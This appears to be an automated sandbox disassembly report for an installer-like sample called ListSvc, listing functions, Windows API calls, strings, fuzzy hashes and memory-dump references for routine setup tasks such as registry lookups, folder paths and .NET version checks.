Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C

Uniqueness

Uniqueness Score: -1.00%

Function 005C7CE0, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D22
GetVersion.KERNEL32(00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D3F
GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D59
CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,005C7ECB,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7D74
FreeSid.ADVAPI32(00000000,005C7ED2,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C7EC5

Strings

CheckTokenMembership, xrefs: 005C7D4F
advapi32.dll, xrefs: 005C7D54

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: AllocateCheckFreeHandleInitializeMembershipModuleTokenVersion
String ID: CheckTokenMembership$advapi32.dll
API String ID: 2691416632-1888249752
Opcode ID: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
Instruction ID: 9e47304f2c2519385998e5d426bc562542af73c677c294aaacd6cf1c30b33c32
Opcode Fuzzy Hash: 1e224452f98f28684b28cd542a9aef5b7292b81c784e0a64638696cbd7ae50c3
Instruction Fuzzy Hash: A2514472A0830D6EDB11EAF98D42FBE7BACBF1C705F1044AEF501E6681D6789D408B65

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2C4, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6

Strings

Software\Borland\Locales, xrefs: 0040E3B8
Software\Borland\Delphi\Locales, xrefs: 0040E3D6
Software\Embarcadero\Locales, xrefs: 0040E33C, 0040E35E
Software\CodeGear\Locales, xrefs: 0040E37C, 0040E39A

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Open$QueryValue$CloseFileModuleName
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
API String ID: 2701450724-3496071916
Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD

Strings

Common Files, xrefs: 006AC393
ProgramFilesDir, xrefs: 006AC322, 006AC3A9
Failed to get path of 64-bit Program Files directory, xrefs: 006AC3CB
cmd.exe, xrefs: 006AC53B
\Program Files, xrefs: 006AC349
CommonFilesDir, xrefs: 006AC35C, 006AC3D8
SystemDrive, xrefs: 006AC2C1
Failed to get path of 64-bit Common Files directory, xrefs: 006AC3FA
COMMAND.COM, xrefs: 006AC55C

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
API String ID: 969438705-544719455
Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC

Strings

p\l, xrefs: 00410C6E
P\l, xrefs: 00410C09

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ExceptionRaise
String ID: P\l$p\l
API String ID: 3997070919-2963016475
Opcode ID: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction ID: dea4787ea8a346106a271a8220094215500c3d30852de538169348a6bce77c0f
Opcode Fuzzy Hash: aa0e87082271f6f024034dc3e0c9ed7691aad24ca827c03d937f00bb865530d3
Instruction Fuzzy Hash: EDA18D75A003099FDB24CFA9D881BEEBBB6EB58310F14452AE505A7390DBB4E9C1CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0062709C, Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 162
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 00627149
RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?,?,00627510,00000000), ref: 006271B3
RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,00000001,00000000,00000000,006272A5,?,00626DA0,?,00000000,00000000,00000000,?), ref: 0062721A

Strings

SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 00627169
v4.0.30319, xrefs: 0062713B
v2.0.50727, xrefs: 006271A5
v1.1.4322, xrefs: 0062720C
.NET Framework version %s not found, xrefs: 00627252
.NET Framework not found, xrefs: 00627266
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 006271D0
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 006270FF

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Close
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 3535843008-446240816
Opcode ID: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
Instruction ID: 6a27bfdae97b75501bbdc0cce0dcd9b9ee0f65bcede85a7be403583e7914197f
Opcode Fuzzy Hash: e0941211630b040962ad433e1c7d93649d8e46d21326bdffa5a487f6456e7331
Instruction Fuzzy Hash: 8551E131A091699FCF04DBA8E861FFD7BB7EF45300F1504AAF500A7392D639AB058B21

Uniqueness

Uniqueness Score: -1.00%

Function 0060F06C, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 157
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C,00000000), ref: 0060F221
CloseHandle.KERNEL32(006B7E1B,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060F29C,0060F29C,?,0060F29C), ref: 0060F22E

Part of subcall function 0060EFD8: WaitForInputIdle.USER32 ref: 0060F004
Part of subcall function 0060EFD8: MsgWaitForMultipleObjects.USER32 ref: 0060F026
Part of subcall function 0060EFD8: GetExitCodeProcess.KERNEL32 ref: 0060F037
Part of subcall function 0060EFD8: CloseHandle.KERNEL32(00000001,0060F064,0060F05D,?,?,?,00000001,?,?,0060F406,?,00000000,0060F41C,?,?,?), ref: 0060F057

Strings

.bat, xrefs: 0060F108
.cmd, xrefs: 0060F123
cmd.exe" /C ", xrefs: 0060F155
D, xrefs: 0060F1C0
COMMAND.COM" /C , xrefs: 0060F18C

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
API String ID: 854858120-615399546
Opcode ID: 6066c1e172dc0d99cc31431a10fc3eed621d142c344beddd96f3c6e48ba0f8e2
Instruction ID: 0730013a778409a59d543d7128fc9cae65caf948aa4e6a3f37707057903c9a02
Opcode Fuzzy Hash: 6066c1e172dc0d99cc31431a10fc3eed621d142c344beddd96f3c6e48ba0f8e2
Instruction Fuzzy Hash: 69512134A8030DABDB14EFE5C892ADEBBBAFF44304F60447AB404A76C1D7749E059B95

Uniqueness

Uniqueness Score: -1.00%

Function 005B85F0, Relevance: 10.6, APIs: 7, Instructions: 105
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 005B8604
IsWindowUnicode.USER32 ref: 005B8618
PeekMessageW.USER32 ref: 005B863B
PeekMessageA.USER32 ref: 005B8651
TranslateMessage.USER32 ref: 005B86D6
DispatchMessageW.USER32 ref: 005B86E3
DispatchMessageA.USER32 ref: 005B86EB

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
String ID:
API String ID: 2190272339-0
Opcode ID: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
Instruction ID: 67b3953643da56f9c200822127d0531685f000c00b35d7cfb42a732a483186e2
Opcode Fuzzy Hash: 2f195b20c59e7edbc16b7d2fd048cba63cfdff170111f45a03f5aac70044babc
Instruction Fuzzy Hash: 4921D83034478065EA312D2A1C15BFE9FDD6FF1B49F14545EF58197282CEA9F846C21E

Uniqueness

Uniqueness Score: -1.00%

Function 006AC8CC, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC957
GetLastError.KERNEL32(00000000,00000000,00000000,006ACA22,?,?,00000005,00000000,00000000,?,006B92B5,00000000,006B946A,?,00000000,006B94CE), ref: 006AC960

Strings

Created temporary directory: , xrefs: 006AC909
\_setup64.tmp, xrefs: 006AC9DA
bm, xrefs: 006AC91B
_isetup, xrefs: 006AC942

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup$bm
API String ID: 1375471231-4222912607
Opcode ID: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
Instruction ID: fab29f73b12df9647497e51388a78cad5e0a4b86d3a417c00642db4583a337af
Opcode Fuzzy Hash: f7a217e2c30815a74382ced212125fa0efd95f934c7959fdcee1df4dfdec5075
Instruction Fuzzy Hash: 00412E34A102099BDB01FBA4D891AEEB7B6FF89704F50417AF501B7391DA34AE458B64

Uniqueness

Uniqueness Score: -1.00%

Function 005C92C8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 005C92F7
GetFocus.USER32 ref: 005C92FF
RegisterClassW.USER32 ref: 005C9320
ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C93B8
SetFocus.USER32(00000000,00000000,005C93DA,?,?,00000000,00000001,00000000,?,00624EAB,006D579C,?,00000000,006B9450,?,00000001), ref: 005C93BF

Strings

TWindowDisabler-Window, xrefs: 005C9357, 005C93A0

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: FocusWindow$ActiveClassRegisterShow
String ID: TWindowDisabler-Window
API String ID: 495420250-1824977358
Opcode ID: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
Instruction ID: 15dfa4f4c92537cee7ed1e4bf608ea9bac44f034fc845b592ccaf34af6f1c1de
Opcode Fuzzy Hash: f6024229119579bb9558f94a5f3e2433b374e9a692c523404650e8e6a3f60a8b
Instruction Fuzzy Hash: 1321E570A41700AFD710EBA59C56F5ABBA5FB85B00F51452DF900EB6D1EB78AC40C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 006C4660, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C4673), ref: 00410BB4

GetWindowLongW.USER32(?,000000EC), ref: 006C4683
SetWindowLongW.USER32 ref: 006C469F
SetErrorMode.KERNEL32(00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C46B4

Part of subcall function 006B9800: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765

Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281

ShowWindow.USER32(?,00000005,00000000,006C46F1,?,?,000000EC,00000000), ref: 006C472B

Strings

Loj, xrefs: 006C4737
Setup, xrefs: 006C4711

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
String ID: Loj$Setup
API String ID: 1533765661-1180797960
Opcode ID: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
Instruction ID: d4d45baa3e9a68820d1f8b3b63154724c7fffc608bd47f906fb52fcab16a7fb3
Opcode Fuzzy Hash: 3d0304c784d3bd607acd89935b1016d88a71efec8a9d6f2a7abca0b2f7454e11
Instruction Fuzzy Hash: BE216D782046009FD700EF29DC91DA67BFAEB9E71071145B8F9008B3A2CE74BC80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005CE26C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDC.USER32(00000000), ref: 005CE27D

Part of subcall function 004EE238: EnterCriticalSection.KERNEL32(?,00000000,004EE4A7,?,?), ref: 004EE280

SelectObject.GDI32(00000001,00000000), ref: 005CE29F
GetTextExtentPointW.GDI32(00000001,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CE2B3
GetTextMetricsW.GDI32(00000001,?,00000000,005CE2F8,?,00000000,?,0068D5D0,00000001), ref: 005CE2D5
ReleaseDC.USER32 ref: 005CE2F2

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 005CE2AA

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
